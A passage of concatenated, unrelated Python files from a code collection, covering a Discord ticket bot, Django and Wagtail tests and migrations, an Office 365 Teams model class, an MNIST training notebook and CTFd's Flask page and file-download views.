if trigger.lower() in message.content.lower():
return await message.reply(file_json['response'])
return
def setup_logging():
"""Sets up the logger"""
logger = logging.getLogger('disnake')
logger.setLevel(logging.DEBUG)
handler = logging.FileHandler(
filename='disnake.log', encoding='utf-8', mode='w')
handler.setFormatter(logging.Formatter(
'%(asctime)s:%(levelname)s:%(name)s: %(message)s'))
logger.addHandler(handler)
async def setup_database():
""" Setup mongo database """
print("Setting Up MongoDB!")
connection = motor.motor_asyncio.AsyncIOMotorClient(
config["mongoDB_connection_url"])
print("MongoDB Connection Successful!")
try:
db = connection[config["mongoDB_database_name"]]
print("MongoDB Checking database")
if db['genral_info'] is None:
print("MongoDB Database is not setup- EXITING")
exit(1)
print("MongoDB Database Loaded!")
except Exception as e:
print(f"MongoDB Failed to load database: {e}, EXIT.")
exit(1)
return db
async def init_ticket(ctx: commands.Context, channel: disnake.TextChannel, category: str, bot: disnake.Client):
"""Initialize a ticket"""
msg = await channel.send("Please describe your issue in less than 100 words. The request shall timeout in 180 seconds.")
try:
ans = await bot.wait_for('message', check=lambda m: m.author == ctx.author and m.channel == channel, timeout=180)
except asyncio.TimeoutError:
emb = disnake.Embed(
title=f"Ticket Number: {channel.name.split('-')[0]}",
description="None provided",
color=disnake.Color.green()
)
emb.set_footer(
text=f"Please wait for the support team to respond. If you already own a server on our paid plan, please type in {config['prefix']}serverinfo <support code> to help us resolve your issue faster!")
emb.set_author(name=ctx.author.name, icon_url=ctx.author.avatar.url)
else:
emb = disnake.Embed(
title=f"Ticket Number: {channel.name.split('-')[0]}",
description=ans.content,
color=disnake.Color.green()
)
emb.set_footer(
text=f"Please wait for the support team to respond. If you already own a server on our paid plan, please type in {config['prefix']}serverinfo <support code> to help us resolve your issue faster!")
emb.set_author(name=ctx.author.name, icon_url=ctx.author.avatar.url)
emb.add_field(name="Category", value=category)
if category == 'paid':
# TODO: CHECK IF THEY HAVE THE PAID USER ROLE! IF SO PING THE SUPPORT TEAM!
text = f"Priority Support"
else:
text = "If you want priority support, you can get a paid server!"
await channel.purge(limit=3)
await channel.send(content=text, embed=emb, view=views.close_button())
|
py | b40415feecfe8ccf29b1c406fa6eb8ca5a98b7e5 | def imgLookup(searchTerm):
import os
import sys
import time
from urllib import FancyURLopener
import urllib2
import simplejson
import cv2
import numpy as np
import urllib
searchTerm = searchTerm.replace(' ','%20')
#Please update this for the newer versions for Mozilla
class MyOpener(FancyURLopener):
version = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11'
myopener = MyOpener()
for i in range(0,1):
url = ('https://ajax.googleapis.com/ajax/services/search/images?' + 'v=1.0&q='+searchTerm+'&start='+str(i*1)+'&userip=MyIP')
request = urllib2.Request(url, None, {'Referer': 'testing'})
response = urllib2.urlopen(request)
results = simplejson.load(response)
data = results['responseData']
dataInfo = data['results']
for i in dataInfo:
req = urllib.urlopen(i['unescapedUrl'])
arr = np.asarray(bytearray(req.read()), dtype=np.uint8)
img = cv2.imdecode(arr,-1)
r = 200.0 / img.shape[1]
dim = (200, int(img.shape[0] * r))
resized = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)
cv2.imshow('Picture',resized)
if cv2.waitKey() & 0xff == 27:
quit()
time.sleep(2)
|
py | b4041706ae057e2818ecbf6e3f9729734b402469 | from test_plus import TestCase
class SitemapsTest(TestCase):
def test_sitemap_xml(self):
self.assertGoodView('sitemap')
|
py | b40417e955b41a8197ea63f0b72625bf69409887 | from src.connection.models.responseModel import ResponseModel
from requests.models import Response
from src.connection.client import Client
class ConnectionClient:
def __init__(self, client: Client) -> None:
self.client = client
def get(self, url):
response = self.client.get(url)
return self.handleConnectionStatus(response)
def handleConnectionStatus(self, response: Response):
if response.status_code == 200:
responseModel = ResponseModel(response.status_code, response.body)
return responseModel
if response.status_code == 404:
raise "not found"
if response.status_code == 500:
raise "internal error"
raise 'offline'
|
py | b404184e31a3f80ff65a6697e65bf8c05371579d | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.
Copyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
""" # noqa
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pipeline', '0003_auto_20180206_1955'),
]
operations = [
migrations.AlterField(
model_name='templatescheme',
name='unique_id',
field=models.CharField(unique=True, max_length=97, verbose_name='\u65b9\u6848\u552f\u4e00ID', blank=True),
),
]
|
py | b40418fc61832368bb037568ce8125571d354d62 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Nonce',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),
('nonce', models.CharField(max_length=128, unique=True)),
],
),
]
|
py | b40419371408b81e1cce2292f4e082c483d5d894 | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Difference'] , ['Lag1Trend'] , ['Seasonal_DayOfWeek'] , ['AR'] ); |
py | b4041959b43e5ea5e77baf21e72090d17b15cdab | # armstrong no.#
num=int(input("enter the no."))
num1=num
sum=len(str(num))
sum1=0
while num>0:
index=num%10
sum1+=index**(sum)
num//=10
if sum1==num1:
print("armstrong no.",sum1)
else:
print("not armstrong no.",num)
|
py | b4041a92a9c412ef3640af85ece71e2a64957c2a | from office365.entity import Entity
from office365.runtime.queries.service_operation_query import ServiceOperationQuery
from office365.runtime.resource_path import ResourcePath
from office365.teams.channel import Channel
from office365.teams.channelCollection import ChannelCollection
from office365.teams.schedule import Schedule
from office365.teams.teamFunSettings import TeamFunSettings
from office365.teams.teamGuestSettings import TeamGuestSettings
from office365.teams.teamMemberSettings import TeamMemberSettings
from office365.teams.teamMessagingSettings import TeamMessagingSettings
from office365.teams.teamsAppInstallationCollection import TeamsAppInstallationCollection
from office365.teams.teamsAsyncOperationCollection import TeamsAsyncOperationCollection
class Team(Entity):
"""A team in Microsoft Teams is a collection of channel objects. A channel represents a topic, and therefore a
logical isolation of discussion, within a team. """
def __init__(self, context, resource_path=None, properties=None):
super().__init__(context, resource_path, properties)
self.memberSettings = TeamMemberSettings()
self.guestSettings = TeamGuestSettings()
self.messagingSettings = TeamMessagingSettings()
self.funSettings = TeamFunSettings()
@property
def displayName(self):
"""The name of the team."""
return self.properties.get('displayName', None)
@property
def description(self):
"""An optional description for the team."""
return self.properties.get('description', None)
@property
def classification(self):
"""An optional label. Typically describes the data or business sensitivity of the team.
Must match one of a pre-configured set in the tenant's directory."""
return self.properties.get('classification', None)
@property
def visibility(self):
"""The visibility of the group and team. Defaults to Public."""
return self.properties.get('visibility', None)
@property
def webUrl(self):
"""A hyperlink that will go to the team in the Microsoft Teams client. This is the URL that you get when
you right-click a team in the Microsoft Teams client and select Get link to team. This URL should be treated
as an opaque blob, and not parsed."""
return self.properties.get('webUrl', None)
@property
def createdDateTime(self):
"""Timestamp at which the team was created."""
return self.properties.get('createdDateTime', None)
@property
def channels(self):
"""The collection of channels & messages associated with the team."""
return self.properties.get('channels',
ChannelCollection(self.context, ResourcePath("channels", self.resource_path)))
@property
def primary_channel(self):
"""The general channel for the team."""
return self.properties.get('primaryChannel',
Channel(self.context, ResourcePath("primaryChannel", self.resource_path)))
@property
def schedule(self):
"""The schedule of shifts for this team."""
return self.properties.get('schedule',
Schedule(self.context, ResourcePath("schedule", self.resource_path)))
@property
def installedApps(self):
"""The apps installed in this team."""
return self.properties.get('installedApps',
TeamsAppInstallationCollection(self.context,
ResourcePath("installedApps", self.resource_path)))
@property
def operations(self):
"""The async operations that ran or are running on this team."""
return self.properties.get('operations',
TeamsAsyncOperationCollection(self.context,
ResourcePath("installedApps", self.resource_path)))
def archive(self):
"""Archive the specified team. When a team is archived, users can no longer send or like messages on any
channel in the team, edit the team's name, description, or other settings, or in general make most changes to
the team. Membership changes to the team continue to be allowed. """
qry = ServiceOperationQuery(self, "archive")
self.context.add_query(qry)
return self
def unarchive(self):
"""Restore an archived team. This restores users' ability to send messages and edit the team, abiding by
tenant and team settings. """
qry = ServiceOperationQuery(self, "unarchive")
self.context.add_query(qry)
return self
def clone(self):
"""Create a copy of a team. This operation also creates a copy of the corresponding group. """
qry = ServiceOperationQuery(self, "clone")
self.context.add_query(qry)
return self
def set_property(self, name, value, persist_changes=True):
super(Team, self).set_property(name, value, persist_changes)
# fallback: determine whether resource path is resolved
if name == "id" and self._resource_path.segment == "team":
self._resource_path = ResourcePath(value, ResourcePath("teams"))
return self
|
py | b4041b238244e4783ae87c4f36f438949cadfcd1 | from django.test import RequestFactory, TestCase, override_settings
from django.utils.encoding import force_bytes
from wagtail.core.models import Site
from ..utils import FieldsParameterParseError, get_base_url, parse_boolean, parse_fields_parameter
class DynamicBaseUrl:
def __str__(self):
return 'https://www.example.com'
def __bytes__(self):
return force_bytes(self.__str__())
def decode(self, *args, **kwargs):
return self.__bytes__().decode(*args, **kwargs)
class TestGetBaseUrl(TestCase):
def setUp(self):
Site.objects.all().delete()
def prepare_site(self):
return Site.objects.get_or_create(
hostname='other.example.com',
port=8080,
root_page_id=1,
is_default_site=True,
)[0]
def clear_cached_site(self, request):
del request._wagtail_site
def test_get_base_url_unset(self):
self.assertIsNone(get_base_url())
def test_get_base_url_from_request(self):
# base url for siteless request should be None
request = RequestFactory().get('/')
self.assertIsNone(Site.find_for_request(request))
self.assertIsNone(get_base_url(request))
# base url for request with a site should be based on the site's details
site = self.prepare_site()
self.clear_cached_site(request)
self.assertEqual(site, Site.find_for_request(request))
self.assertEqual(get_base_url(request), 'http://other.example.com:8080')
# port 443 should indicate https without a port
site.port = 443
site.save()
self.clear_cached_site(request)
self.assertEqual(get_base_url(request), 'https://other.example.com')
# port 80 should indicate http without a port
site.port = 80
site.save()
self.clear_cached_site(request)
self.assertEqual(get_base_url(request), 'http://other.example.com')
@override_settings(WAGTAILAPI_BASE_URL='https://bar.example.com')
def test_get_base_url_prefers_setting(self):
request = RequestFactory().get('/')
site = self.prepare_site()
self.assertEqual(site, Site.find_for_request(request))
self.assertEqual(get_base_url(request), 'https://bar.example.com')
with override_settings(WAGTAILAPI_BASE_URL=None):
self.assertEqual(get_base_url(request), 'http://other.example.com:8080')
@override_settings(WAGTAILAPI_BASE_URL='https://bar.example.com')
def test_get_base_url_from_setting_string(self):
self.assertEqual(get_base_url(), 'https://bar.example.com')
@override_settings(WAGTAILAPI_BASE_URL=b'https://baz.example.com')
def test_get_base_url_from_setting_bytes(self):
self.assertEqual(get_base_url(), 'https://baz.example.com')
@override_settings(WAGTAILAPI_BASE_URL=DynamicBaseUrl())
def test_get_base_url_from_setting_object(self):
self.assertEqual(get_base_url(), 'https://www.example.com')
class TestParseFieldsParameter(TestCase):
# GOOD STUFF
def test_valid_single_field(self):
parsed = parse_fields_parameter('test')
self.assertEqual(parsed, [
('test', False, None),
])
def test_valid_multiple_fields(self):
parsed = parse_fields_parameter('test,another_test')
self.assertEqual(parsed, [
('test', False, None),
('another_test', False, None),
])
def test_valid_negated_field(self):
parsed = parse_fields_parameter('-test')
self.assertEqual(parsed, [
('test', True, None),
])
def test_valid_nested_fields(self):
parsed = parse_fields_parameter('test(foo,bar)')
self.assertEqual(parsed, [
('test', False, [
('foo', False, None),
('bar', False, None),
]),
])
def test_valid_star_field(self):
parsed = parse_fields_parameter('*,-test')
self.assertEqual(parsed, [
('*', False, None),
('test', True, None),
])
def test_valid_star_with_additional_field(self):
# Note: '*,test' is not allowed but '*,test(foo)' is
parsed = parse_fields_parameter('*,test(foo)')
self.assertEqual(parsed, [
('*', False, None),
('test', False, [
('foo', False, None),
]),
])
def test_valid_underscore_field(self):
parsed = parse_fields_parameter('_,test')
self.assertEqual(parsed, [
('_', False, None),
('test', False, None),
])
def test_valid_field_with_underscore_in_middle(self):
parsed = parse_fields_parameter('a_test')
self.assertEqual(parsed, [
('a_test', False, None),
])
def test_valid_negated_field_with_underscore_in_middle(self):
parsed = parse_fields_parameter('-a_test')
self.assertEqual(parsed, [
('a_test', True, None),
])
def test_valid_field_with_underscore_at_beginning(self):
parsed = parse_fields_parameter('_test')
self.assertEqual(parsed, [
('_test', False, None),
])
def test_valid_field_with_underscore_at_end(self):
parsed = parse_fields_parameter('test_')
self.assertEqual(parsed, [
('test_', False, None),
])
# BAD STUFF
def test_invalid_char(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test#')
self.assertEqual(str(e.exception), "unexpected char '#' at position 4")
def test_invalid_whitespace_before_identifier(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter(' test')
self.assertEqual(str(e.exception), "unexpected whitespace at position 0")
def test_invalid_whitespace_after_identifier(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test ')
self.assertEqual(str(e.exception), "unexpected whitespace at position 4")
def test_invalid_whitespace_after_comma(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test, test')
self.assertEqual(str(e.exception), "unexpected whitespace at position 5")
def test_invalid_whitespace_before_comma(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test ,test')
self.assertEqual(str(e.exception), "unexpected whitespace at position 4")
def test_invalid_unexpected_negation_operator(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test-')
self.assertEqual(str(e.exception), "unexpected char '-' at position 4")
def test_invalid_unexpected_open_bracket(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test,(foo)')
self.assertEqual(str(e.exception), "unexpected char '(' at position 5")
def test_invalid_unexpected_close_bracket(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test)')
self.assertEqual(str(e.exception), "unexpected char ')' at position 4")
def test_invalid_unexpected_comma_in_middle(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test,,foo')
self.assertEqual(str(e.exception), "unexpected char ',' at position 5")
def test_invalid_unexpected_comma_at_end(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test,foo,')
self.assertEqual(str(e.exception), "unexpected char ',' at position 9")
def test_invalid_unclosed_bracket(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test(foo')
self.assertEqual(str(e.exception), "unexpected end of input (did you miss out a close bracket?)")
def test_invalid_subfields_on_negated_field(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('-test(foo)')
self.assertEqual(str(e.exception), "unexpected char '(' at position 5")
def test_invalid_star_field_in_wrong_position(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test,*')
self.assertEqual(str(e.exception), "'*' must be in the first position")
def test_invalid_negated_star(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('-*')
self.assertEqual(str(e.exception), "'*' cannot be negated")
def test_invalid_star_with_nesting(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('*(foo,bar)')
self.assertEqual(str(e.exception), "unexpected char '(' at position 1")
def test_invalid_star_with_chars_after(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('*foo')
self.assertEqual(str(e.exception), "unexpected char 'f' at position 1")
def test_invalid_star_with_chars_before(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('foo*')
self.assertEqual(str(e.exception), "unexpected char '*' at position 3")
def test_invalid_star_with_additional_field(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('*,foo')
self.assertEqual(str(e.exception), "additional fields with '*' doesn't make sense")
def test_invalid_underscore_in_wrong_position(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test,_')
self.assertEqual(str(e.exception), "'_' must be in the first position")
def test_invalid_negated_underscore(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('-_')
self.assertEqual(str(e.exception), "'_' cannot be negated")
def test_invalid_underscore_with_nesting(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('_(foo,bar)')
self.assertEqual(str(e.exception), "unexpected char '(' at position 1")
def test_invalid_underscore_with_negated_field(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('_,-foo')
self.assertEqual(str(e.exception), "negated fields with '_' doesn't make sense")
def test_invalid_star_and_underscore(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('*,_')
self.assertEqual(str(e.exception), "'_' must be in the first position")
class TestParseBoolean(TestCase):
# GOOD STUFF
def test_valid_true(self):
parsed = parse_boolean('true')
self.assertEqual(parsed, True)
def test_valid_false(self):
parsed = parse_boolean('false')
self.assertEqual(parsed, False)
def test_valid_1(self):
parsed = parse_boolean('1')
self.assertEqual(parsed, True)
def test_valid_0(self):
parsed = parse_boolean('0')
self.assertEqual(parsed, False)
# BAD STUFF
def test_invalid(self):
with self.assertRaises(ValueError) as e:
parse_boolean('foo')
self.assertEqual(str(e.exception), "expected 'true' or 'false', got 'foo'")
def test_invalid_integer(self):
with self.assertRaises(ValueError) as e:
parse_boolean('2')
self.assertEqual(str(e.exception), "expected 'true' or 'false', got '2'")
|
py | b4041b4991d083a7508dc3d6611eaf3d68e4e6fc | # -*- coding: utf-8 -*-
"""EVA6-S3.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1SmU-_HVOF6eYhnFCPQJh-WueoB18H6hM
### **Check the Alloted Device Specs**
"""
!nvidia-smi
"""
###**Mount GDrive to Colab**"""
from google.colab import drive
drive.mount('/content/gdrive')
"""###**Load required modules**"""
# Commented out IPython magic to ensure Python compatibility.
from __future__ import print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
import matplotlib.pyplot as plt
from torch.utils.data import Dataset
import random
from torchsummary import summary
import pandas as pd
from PIL import Image
import csv
import gzip
import numpy as np
import os
from torch.utils.tensorboard import SummaryWriter
import torchvision
# %load_ext tensorboard
"""###**Set Device and other Params**"""
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
GPU_BATCH_SIZE = 128
CPU_BATCH_SIZE = 64
NUM_WORKERS = 2
LR = 0.01
# Dataset related paths
dataset_path = '/content/gdrive/MyDrive/EVA6/MNIST/Dataset/'
train_data_path, test_data_path = 'train-images-idx3-ubyte.gz', 't10k-images-idx3-ubyte.gz'
train_labels_path, test_labels_path = 'train-labels-idx1-ubyte.gz', 't10k-labels-idx1-ubyte.gz'
"""###**Functions to Get Images and Labels**"""
def getimages(path: str):
"""
Opens gz dataset file and returns images
"""
if path.endswith('-idx3-ubyte.gz'):
with gzip.open(path) as dataset:
magic_num = int.from_bytes(dataset.read(4), 'big')
image_count = int.from_bytes(dataset.read(4), 'big')
row_count = int.from_bytes(dataset.read(4), 'big')
column_count = int.from_bytes(dataset.read(4), 'big')
images = np.frombuffer(dataset.read(), dtype=np.uint8).reshape(image_count, 1, row_count, column_count).astype(np.float32)
print('Images Shape: ', images.shape)
return images
def getlabels(path: str):
"""
Opens gz dataset file and returns labels
"""
if path.endswith('-idx1-ubyte.gz'):
with gzip.open(path) as dataset:
magic_number = int.from_bytes(dataset.read(4),'big')
label_count=int.from_bytes(dataset.read(4), 'big')
labels = np.frombuffer(dataset.read(), dtype=np.uint8).astype(np.longlong)
print('Labels Shape: ', labels.shape)
return labels
"""###**Data & Transformations**
"""
train_data = getimages(os.path.join(dataset_path, train_data_path))
train_labels = getlabels(os.path.join(dataset_path, train_labels_path))
test_data = getimages(os.path.join(dataset_path, test_data_path))
test_labels = getlabels(os.path.join(dataset_path, test_labels_path))
train_transforms=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
test_transforms=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,),(0.3081,))
])
"""###**Custom Dataset(MNIST + Random Number)**"""
class RandomMNIST(Dataset):
"""
Custom Dataset Class with 2 I/P & 2 O/P
"""
def __init__(self, data, labels):
self.data = data
self.random_num = np.ones(60000)
self.labels = labels
self.sum = np.ones(60000)
def __len__(self):
return len(self.data)
def __getitem__(self, index):
self.random_num[index] = np.random.randint(low=0, high=9,size=(1,))
self.sum[index]=int(self.random_num[index]) + self.labels[index]
# self.data[index] = np.expand_dims(self.data[index], axis=0)
return self.data[index], int(self.random_num[index]), self.labels[index], self.sum[index]
"""###**Get Data'Loader'**"""
def Data_To_Dataloader(trainset,testset,seed=1,batch_size=GPU_BATCH_SIZE, num_workers=NUM_WORKERS,pin_memory=True):
"""
Converts DataSet Object to DataLoader
"""
SEED = 1
cuda = torch.cuda.is_available()
torch.manual_seed(SEED)
if cuda:
torch.cuda.manual_seed(SEED)
dataloader_args = dict(shuffle=True, batch_size=GPU_BATCH_SIZE, num_workers=NUM_WORKERS, pin_memory=pin_memory) if cuda else dict(shuffle=True, batch_size=CPU_BATCH_SIZE)
trainloader = torch.utils.data.DataLoader(trainset, **dataloader_args)
testloader = torch.utils.data.DataLoader(testset, **dataloader_args)
return trainloader, testloader
train = RandomMNIST(train_data, train_labels)
test = RandomMNIST(test_data, test_labels)
trainloader, testloader = Data_To_Dataloader(train, test)
"""###**Finally the NeuralNet Class**"""
class Net(nn.Module):
"""
Simple NN Class which takes two inputs and returns two outputs
"""
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=32, kernel_size=(3,3), padding=0, bias=False),
nn.ReLU(),
nn.BatchNorm2d(32)
)
self.conv2 = nn.Sequential(
nn.Conv2d(in_channels=32, out_channels=64, kernel_size=(5,5), padding=0, bias=False),
nn.ReLU(),
nn.BatchNorm2d(64)
)
self.conv3 = nn.Sequential(
nn.Conv2d(in_channels=64, out_channels=128, kernel_size=(3,3), padding=0, bias=False),
nn.ReLU(),
nn.BatchNorm2d(128)
)
self.conv4 = nn.Sequential(
nn.Conv2d(in_channels=128, out_channels=32, kernel_size=(1,1), padding=0, bias=False),
nn.ReLU(),
nn.BatchNorm2d(32)
)
self.conv5 = nn.Sequential(
nn.Conv2d(in_channels=32, out_channels=64, kernel_size=(3,3), padding=1, bias=False)
)
self.conv6 = nn.Sequential(
nn.Conv2d(in_channels=64, out_channels=32, kernel_size=(3,3), padding=0, bias=False)
)
self.conv7 = nn.Sequential(
nn.Conv2d(in_channels=32, out_channels=10, kernel_size=(1,1), padding=0, bias=False)
)
self.gap=nn.AdaptiveAvgPool2d(1)
# self.pred_list=[]
def forward(self, input, rand_num):
x, num = input, rand_num
x = self.conv1(input)
x = self.conv2(x)
x = self.conv3(x)
maxpool_1 = F.max_pool2d(x, kernel_size=2, stride=2)
x = self.conv4(maxpool_1)
x=self.conv5(x)
x=self.conv6(x)
x=self.conv7(x)
x=self.gap(x)
x=x.view(-1,10)
max_arg_index=torch.argmax(F.log_softmax(x,dim=-1), dim=1)
labels=[i for i in range(0,10)]
final_pred=[labels[i] for i in max_arg_index]
return F.log_softmax(x, dim=-1), num
"""###**Train & Test Network**"""
net = Net()
model=net.to(torch.device("cuda"))
# set optimizer to Adam
optimizer=optim.Adam(model.parameters(), lr=LR)
# set loss func to CrossEntropy
criterion = nn.CrossEntropyLoss()
# Creating a tb instance of SummaryWriter
tb = SummaryWriter()
count=0
def correct_pred(pred,labels):
"""
Returns Sum of Correct Predictions
"""
return pred.argmax(dim=1).eq(labels).sum().item()
# Training & Testing Loop
for e in range(10):
train_loss, train_loss_item, train_correct=0,0, 0
test_loss, test_correct=0,0
print(f'Epoch:{e}')
# running model on train data
for batch in trainloader:
count+=1
images, rand_num, labels, sum = batch
images, rand_num, labels, sum = images.to(device), rand_num.to(device), labels.to(device), sum.to(device)
preds, n = model(images, rand_num)
loss=criterion(preds, labels)
optimizer.zero_grad()
loss.backward() # calc grad through backprop
optimizer.step() # update network weights
# update loss and accuracy
train_loss += loss
train_loss_item += loss.item()
train_correct += correct_pred(preds, labels)
# running model on test data
with torch.no_grad():
for batch in testloader:
images, rand_num, labels, sum = batch
images, rand_num, labels, sum = images.to(device), rand_num.to(device), labels.to(device), sum.to(device)
preds, num = model(images, rand_num)
loss=criterion(preds, labels)
test_loss += loss.item()
test_correct += correct_pred(preds, labels)
train_acc = train_correct/(len(trainloader)*128)*100
test_acc = test_correct/(len(testloader)*128)*100
print(f'TrainSet: [Accuracy={train_acc}, Loss={train_loss}]')
print(f'TestSet: [Accuracy:{test_acc}, Loss:{test_loss}]\n')
# tensorboard integration
tb.add_scalar('Train Loss', train_loss, e )
tb.add_scalar('Train Accuracy', train_acc, e )
tb.add_scalar('Test Loss', test_loss, e )
tb.add_scalar('Test Accuracy', test_acc, e )
tb.close()
"""###**TensorBoard Dashboard**"""
# Commented out IPython magic to ensure Python compatibility.
# %tensorboard --logdir /content/runs
|
py | b4041da95499eec1eebf357ec293a261bd790043 | from flask import (
current_app as app,
render_template,
request,
redirect,
abort,
url_for,
session,
Blueprint,
Response,
send_file,
)
from flask.helpers import safe_join
from CTFd.models import db, Users, Admins, Teams, Files, Pages, Notifications
from CTFd.utils import markdown
from CTFd.cache import cache
from CTFd.utils import get_config, set_config
from CTFd.utils.user import authed, get_current_user
from CTFd.utils import config
from CTFd.utils.uploads import get_uploader
from CTFd.utils.config.pages import get_page
from CTFd.utils.config.visibility import challenges_visible
from CTFd.utils.security.auth import login_user
from CTFd.utils.security.csrf import generate_nonce
from CTFd.utils import user as current_user
from CTFd.utils.dates import ctftime
from CTFd.utils.decorators import authed_only
from CTFd.utils.security.signing import (
unserialize,
BadTimeSignature,
SignatureExpired,
BadSignature,
)
from sqlalchemy.exc import IntegrityError
import os
views = Blueprint("views", __name__)
@views.route("/setup", methods=["GET", "POST"])
def setup():
if not config.is_setup():
if not session.get("nonce"):
session["nonce"] = generate_nonce()
if request.method == "POST":
ctf_name = request.form["ctf_name"]
set_config("ctf_name", ctf_name)
# CSS
set_config("start", "")
# Admin user
name = request.form["name"]
email = request.form["email"]
password = request.form["password"]
admin = Admins(
name=name, email=email, password=password, type="admin", hidden=True
)
user_mode = request.form["user_mode"]
set_config("user_mode", user_mode)
# Index page
index = """<div class="row">
<div class="col-md-6 offset-md-3">
<img class="w-100 mx-auto d-block" style="max-width: 500px;padding: 50px;padding-top: 14vh;" src="themes/core/static/img/logo.png" />
<h3 class="text-center">
<p>A cool CTF platform from <a href="https://ctfd.io">ctfd.io</a></p>
<p>Follow us on social media:</p>
<a href="https://twitter.com/ctfdio"><i class="fab fa-twitter fa-2x" aria-hidden="true"></i></a>
<a href="https://facebook.com/ctfdio"><i class="fab fa-facebook fa-2x" aria-hidden="true"></i></a>
<a href="https://github.com/ctfd"><i class="fab fa-github fa-2x" aria-hidden="true"></i></a>
</h3>
<br>
<h4 class="text-center">
<a href="admin">Click here</a> to login and setup your CTF
</h4>
</div>
</div>""".format(
request.script_root
)
page = Pages(title=None, route="index", content=index, draft=False)
# Visibility
set_config("challenge_visibility", "private")
set_config("registration_visibility", "public")
set_config("score_visibility", "public")
set_config("account_visibility", "public")
# Start time
set_config("start", None)
set_config("end", None)
set_config("freeze", None)
# Verify emails
set_config("verify_emails", None)
set_config("mail_server", None)
set_config("mail_port", None)
set_config("mail_tls", None)
set_config("mail_ssl", None)
set_config("mail_username", None)
set_config("mail_password", None)
set_config("mail_useauth", None)
set_config("setup", True)
try:
db.session.add(admin)
db.session.commit()
except IntegrityError:
db.session.rollback()
try:
db.session.add(page)
db.session.commit()
except IntegrityError:
db.session.rollback()
login_user(admin)
db.session.close()
app.setup = False
with app.app_context():
cache.clear()
return redirect(url_for("views.static_html"))
return render_template("setup.html", nonce=session.get("nonce"))
return redirect(url_for("views.static_html"))
@views.route("/notifications", methods=["GET"])
def notifications():
notifications = Notifications.query.order_by(Notifications.id.desc()).all()
return render_template("notifications.html", notifications=notifications)
@views.route("/settings", methods=["GET"])
@authed_only
def settings():
user = get_current_user()
name = user.name
email = user.email
website = user.website
affiliation = user.affiliation
country = user.country
prevent_name_change = get_config("prevent_name_change")
confirm_email = get_config("verify_emails") and not user.verified
return render_template(
"settings.html",
name=name,
email=email,
website=website,
affiliation=affiliation,
country=country,
prevent_name_change=prevent_name_change,
confirm_email=confirm_email,
)
@views.route("/static/user.css")
def custom_css():
"""
Custom CSS Handler route
:return:
"""
return Response(get_config("css"), mimetype="text/css")
@views.route("/", defaults={"route": "index"})
@views.route("/<path:route>")
def static_html(route):
"""
Route in charge of routing users to Pages.
:param route:
:return:
"""
page = get_page(route)
if page is None:
abort(404)
else:
if page.auth_required and authed() is False:
return redirect(url_for("auth.login", next=request.full_path))
return render_template("page.html", content=markdown(page.content))
@views.route("/files", defaults={"path": ""})
@views.route("/files/<path:path>")
def files(path):
"""
Route in charge of dealing with making sure that CTF challenges are only accessible during the competition.
:param path:
:return:
"""
f = Files.query.filter_by(location=path).first_or_404()
if f.type == "challenge":
if challenges_visible():
if current_user.is_admin() is False:
if not ctftime():
abort(403)
else:
if not ctftime():
abort(403)
# Allow downloads if a valid token is provided
token = request.args.get("token", "")
try:
data = unserialize(token, max_age=3600)
user_id = data.get("user_id")
team_id = data.get("team_id")
file_id = data.get("file_id")
user = Users.query.filter_by(id=user_id).first()
team = Teams.query.filter_by(id=team_id).first()
# Check user is admin if challenge_visibility is admins only
if (
get_config("challenge_visibility") == "admins"
and user.type != "admin"
):
abort(403)
# Check that the user exists and isn't banned
if user:
if user.banned:
abort(403)
else:
abort(403)
